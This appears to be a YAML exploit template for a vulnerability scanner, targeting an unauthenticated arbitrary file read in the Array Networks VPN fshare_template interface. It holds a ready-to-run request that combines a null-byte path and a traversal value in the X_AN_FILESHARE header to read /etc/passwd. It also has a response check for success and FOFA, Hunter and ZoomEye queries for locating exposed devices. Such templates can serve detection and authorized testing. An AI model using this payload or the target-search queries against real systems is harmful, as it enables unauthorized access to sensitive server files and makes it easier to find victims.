product: Array-Networks-VPN
vName: Array-Networks-VPN fshare_template 任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: Array的 fshare_template 接口可构造特定的请求包进行未授权任意文件读取，从而造成服务器敏感信息泄漏。
version: ''
note: ''
search:
  FOFA: product="Array-VPN" || icon_hash="-1006818220"
  Hunter: app.name="Array Networks VPN"
  ZoomEye: app:"Array Networks secure access gateways VPN server httpd" +country:"CN"
protocol: http
link: https://blog.csdn.net/weixin_45530380/article/details/135260372
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /prx/000/http/localhost/client_sec/%00../../../addfolder
      header:
        X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and